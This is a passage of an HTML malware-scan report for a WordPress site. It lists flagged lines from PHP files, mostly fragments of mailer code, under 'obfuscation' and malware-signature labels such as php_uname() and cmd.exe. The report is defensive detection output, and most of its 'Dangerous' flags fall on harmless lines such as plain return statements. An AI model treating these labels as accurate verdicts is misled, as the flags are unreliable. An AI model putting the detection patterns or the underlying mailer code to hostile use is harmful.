</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">doCallback</span><span style="color: #007700">(</span><span style="color: #0000BB">$isSent</span><span style="color: #007700">, </span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$cc</span><span style="color: #007700">, </span><span style="color: #0000BB">$bcc</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$from</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4315</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function) && </span><span style="color: #0000BB">is_callable</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">action_function</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function, </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4332</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">errorMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$errorMsg</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafheader</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 43</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafTrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4409</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span><span style="color: #DD0000">">check SpamAssassin Score</a></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 45</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">stripslashes</span><span style="color: #007700">(</span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">randString</span><span style="color: #007700">(</span><span style="color: #0000BB">$consonants</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 53</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$password</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafMailCheck</span><span style="color: #007700">(</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 57</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 593</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$level</span><span style="color: #007700">) {echo </span><span style="color: #DD0000">"debug level </span><span style="color: #0000BB">$level</span><span style="color: #DD0000">; message: </span><span style="color: #0000BB">$str</span><span style="color: #DD0000">"</span><span style="color: #007700">;};</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_path</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 687</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">name</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 689</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that handles the result of the send email action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$exceptions </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 922</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__destruct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 939</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 941</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailPassthru</span><span style="color: #007700">(</span><span style="color: #0000BB">$to</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">, </span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$params</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 943</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to avoid double</span><span style="color: #007700">-</span><span style="color: #0000BB">encoding</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 951</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mail</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 957</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 966</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edebug</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 971</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">names</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1732</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">cmd</span><span style="color: #007700">.</span><span style="color: #0000BB">exe</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_190").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/mKrERpfNlok.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 166.77 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 23:17:55</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 23:17:55</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 286</span><br><table id="file_191" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RETURNTRANSFER</span><span style="color: #007700">, </span><span style="color: #0000BB">1</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_URL</span><span style="color: #007700">, </span><span style="color: #DD0000">'http://spamcheck.postmarkapp.com/filter'</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_POSTFIELDS</span><span style="color: #007700">, </span><span style="color: #0000BB">http_build_query</span><span style="color: #007700">(array(</span><span style="color: #DD0000">'email' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messageHeaders</span><span style="color: #007700">,</span><span style="color: #DD0000">'options'</span><span style="color: #007700">=></span><span style="color: #DD0000">'long'</span><span style="color: #007700">))); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">, </span><span style="color: #0000BB">CURLOPT_SSL_VERIFYPEER</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">); </span><span style="color: #0000BB">curl_setopt</span><span style="color: #007700">(</span><span style="color: #0000BB">$ch</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1004</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1006</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSMTP</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1015</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isMail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isSendmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1040</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isQmail</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1056</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean true on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">address already used </span><span style="color: #007700">or </span><span style="color: #0000BB">invalid in some way</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'to'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1065</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">works with the SMTP mailer on win32</span><span style="color: #007700">, </span><span style="color: #0000BB">not with the </span><span style="color: #DD0000">"mail" </span><span style="color: #0000BB">mailer</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'cc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addBCC</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1084</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'bcc'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1093</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addReplyTo</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1095</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #DD0000">'Reply-To'</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function), </span><span style="color: #0000BB">addition of such addresses is delayed until send</span><span style="color: #007700">().</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1102</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">but </span><span style="color: #007700">do </span><span style="color: #0000BB">not </span><span style="color: #007700">throw </span><span style="color: #0000BB">exceptions</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1110</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addOrEnqueueAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func_array</span><span style="color: #007700">(array(</span><span style="color: #0000BB">$this</span><span style="color: #007700">, </span><span style="color: #DD0000">'addAnAddress'</span><span style="color: #007700">), </span><span style="color: #0000BB">$params</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAnAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
